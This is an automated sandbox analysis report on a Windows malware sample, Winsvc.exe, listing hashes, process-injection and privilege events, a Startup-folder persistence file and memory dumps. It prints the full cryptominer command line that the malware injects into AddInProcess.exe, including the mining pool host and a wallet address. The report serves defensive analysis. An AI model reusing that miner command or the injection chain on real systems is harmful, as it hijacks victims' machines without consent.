96c7d1d5dab0c8060f3220816e3e49461ef328643d520545ffc8aa05ddd76760

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Winsvc.exe
Size

1.6MB
MD5

3e4461418de7a12e7951ccf51fe4d4d3
SHA1

d7332419080c1a8eaef111439feb71bda300a1d3
SHA256

96c7d1d5dab0c8060f3220816e3e49461ef328643d520545ffc8aa05ddd76760
SHA512

b01982718c3f62059f086c3274f9f8d1c98bbb9bcc187bfa466b369d08818cd2fe06e0949256eddbfd6f26b3fd5428ea8008d49adf6f233282f08c8dce4e9553
SSDEEP

24576:9sRgQPPLVkiouiRjaMkVRu9JS70cJscGh6U8mEGKacNpVAADNi5GeZTOjo:9sV3LGjpkVIJunw98mTKfVAyNioSTO

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 2004 created 3440	2004	Winsvc.exe	56
PID 4696 created 3440	4696	InnerException.exe	56
PID 2084 created 3440	2084	RegSvcs.exe	56

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FailedAssemblyInfo.vbs	Winsvc.exe

Executes dropped EXE 2 IoCs

pid	Process
4696	InnerException.exe
3388	InnerException.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2004 set thread context of 1520	2004	Winsvc.exe	83
PID 4696 set thread context of 3388	4696	InnerException.exe	98
PID 3388 set thread context of 2084	3388	InnerException.exe	100
PID 2084 set thread context of 4272	2084	RegSvcs.exe	101
PID 4272 set thread context of 2900	4272	RegSvcs.exe	105

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2004	Winsvc.exe
4696	InnerException.exe
2084	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe
4272	RegSvcs.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	Winsvc.exe
Token: SeDebugPrivilege	2004	Winsvc.exe
Token: SeDebugPrivilege	1520	Winsvc.exe
Token: SeDebugPrivilege	4696	InnerException.exe
Token: SeDebugPrivilege	4696	InnerException.exe
Token: SeDebugPrivilege	3388	InnerException.exe
Token: SeDebugPrivilege	2084	RegSvcs.exe
Token: SeDebugPrivilege	2084	RegSvcs.exe
Token: SeDebugPrivilege	4272	RegSvcs.exe
Token: SeLockMemoryPrivilege	2900	AddInProcess.exe
Token: SeLockMemoryPrivilege	2900	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2900	AddInProcess.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 1520	2004	Winsvc.exe	83
PID 2004 wrote to memory of 1520	2004	Winsvc.exe	83
PID 2004 wrote to memory of 1520	2004	Winsvc.exe	83
PID 2004 wrote to memory of 1520	2004	Winsvc.exe	83
PID 2004 wrote to memory of 1520	2004	Winsvc.exe	83
PID 2004 wrote to memory of 1520	2004	Winsvc.exe	83
PID 4696 wrote to memory of 3388	4696	InnerException.exe	98
PID 4696 wrote to memory of 3388	4696	InnerException.exe	98
PID 4696 wrote to memory of 3388	4696	InnerException.exe	98
PID 4696 wrote to memory of 3388	4696	InnerException.exe	98
PID 4696 wrote to memory of 3388	4696	InnerException.exe	98
PID 4696 wrote to memory of 3388	4696	InnerException.exe	98
PID 3388 wrote to memory of 2084	3388	InnerException.exe	100
PID 3388 wrote to memory of 2084	3388	InnerException.exe	100
PID 3388 wrote to memory of 2084	3388	InnerException.exe	100
PID 3388 wrote to memory of 2084	3388	InnerException.exe	100
PID 3388 wrote to memory of 2084	3388	InnerException.exe	100
PID 3388 wrote to memory of 2084	3388	InnerException.exe	100
PID 2084 wrote to memory of 4272	2084	RegSvcs.exe	101
PID 2084 wrote to memory of 4272	2084	RegSvcs.exe	101
PID 2084 wrote to memory of 4272	2084	RegSvcs.exe	101
PID 2084 wrote to memory of 4272	2084	RegSvcs.exe	101
PID 2084 wrote to memory of 4272	2084	RegSvcs.exe	101
PID 2084 wrote to memory of 4272	2084	RegSvcs.exe	101
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105
PID 4272 wrote to memory of 2900	4272	RegSvcs.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3440
- C:\Users\Admin\AppData\Local\Temp\Winsvc.exe
  "C:\Users\Admin\AppData\Local\Temp\Winsvc.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2004
- C:\Users\Admin\AppData\Local\Temp\Winsvc.exe
  "C:\Users\Admin\AppData\Local\Temp\Winsvc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1520
- C:\Users\Admin\AppData\Roaming\Access\InnerException.exe
  "C:\Users\Admin\AppData\Roaming\Access\InnerException.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3388
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2084
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4272
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2900

C:\Users\Admin\AppData\Roaming\Access\InnerException.exe
C:\Users\Admin\AppData\Roaming\Access\InnerException.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Access\InnerException.exe

Filesize
1.6MB

MD5
3e4461418de7a12e7951ccf51fe4d4d3

SHA1
d7332419080c1a8eaef111439feb71bda300a1d3

SHA256
96c7d1d5dab0c8060f3220816e3e49461ef328643d520545ffc8aa05ddd76760

SHA512
b01982718c3f62059f086c3274f9f8d1c98bbb9bcc187bfa466b369d08818cd2fe06e0949256eddbfd6f26b3fd5428ea8008d49adf6f233282f08c8dce4e9553

Download Submit
memory/1520-1167-0x0000000000400000-0x00000000004D0000-memory.dmp

Filesize
832KB

Download
memory/1520-5152-0x00007FFD0C0D0000-0x00007FFD0CB91000-memory.dmp

Filesize
10.8MB

Download
memory/1520-5148-0x00000173DFA90000-0x00000173DFAE4000-memory.dmp

Filesize
336KB

Download
memory/1520-5147-0x00000173C70C0000-0x00000173C7116000-memory.dmp

Filesize
344KB

Download
memory/1520-1469-0x00007FFD0C0D0000-0x00007FFD0CB91000-memory.dmp

Filesize
10.8MB

Download
memory/1520-1170-0x00000173DF7F0000-0x00000173DF8FA000-memory.dmp

Filesize
1.0MB

Download
memory/1520-1171-0x00007FFD0C0D0000-0x00007FFD0CB91000-memory.dmp

Filesize
10.8MB

Download
memory/1520-1169-0x00000173C55F0000-0x00000173C55F8000-memory.dmp

Filesize
32KB

Download
memory/2004-20-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-11-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-61-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-57-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-55-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-53-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-51-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-49-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-45-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-43-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-41-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-39-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-37-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-35-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-31-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-27-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-25-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-23-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-21-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-0-0x00007FFD0C0D3000-0x00007FFD0C0D5000-memory.dmp

Filesize
8KB

Download
memory/2004-17-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-15-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-13-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-63-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-9-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-7-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-4-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-5-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-1154-0x00007FFD0C0D0000-0x00007FFD0CB91000-memory.dmp

Filesize
10.8MB

Download
memory/2004-1155-0x00000236BF990000-0x00000236BFA9E000-memory.dmp

Filesize
1.1MB

Download
memory/2004-1156-0x00000236A5850000-0x00000236A589C000-memory.dmp

Filesize
304KB

Download
memory/2004-1157-0x00000236A5920000-0x00000236A5974000-memory.dmp

Filesize
336KB

Download
memory/2004-1160-0x00007FFD0C0D0000-0x00007FFD0CB91000-memory.dmp

Filesize
10.8MB

Download
memory/2004-1166-0x00007FFD0C0D0000-0x00007FFD0CB91000-memory.dmp

Filesize
10.8MB

Download
memory/2004-65-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-67-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-1168-0x00007FFD0C0D0000-0x00007FFD0CB91000-memory.dmp

Filesize
10.8MB

Download
memory/2004-60-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-47-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-33-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-29-0x00000236BFAB0000-0x00000236BFC49000-memory.dmp

Filesize
1.6MB

Download
memory/2004-3-0x00007FFD0C0D0000-0x00007FFD0CB91000-memory.dmp

Filesize
10.8MB

Download
memory/2004-2-0x00000236BFAB0000-0x00000236BFC50000-memory.dmp

Filesize
1.6MB

Download
memory/2004-1-0x00000236A5270000-0x00000236A540E000-memory.dmp

Filesize
1.6MB

Download
memory/4696-5155-0x00007FFD0BDC0000-0x00007FFD0C881000-memory.dmp

Filesize
10.8MB

Download
memory/4696-5170-0x00007FFD0BDC0000-0x00007FFD0C881000-memory.dmp

Filesize
10.8MB

Download
memory/4696-6307-0x00007FFD0BDC0000-0x00007FFD0C881000-memory.dmp

Filesize
10.8MB

Download
memory/4696-6315-0x00007FFD0BDC0000-0x00007FFD0C881000-memory.dmp

Filesize
10.8MB

Download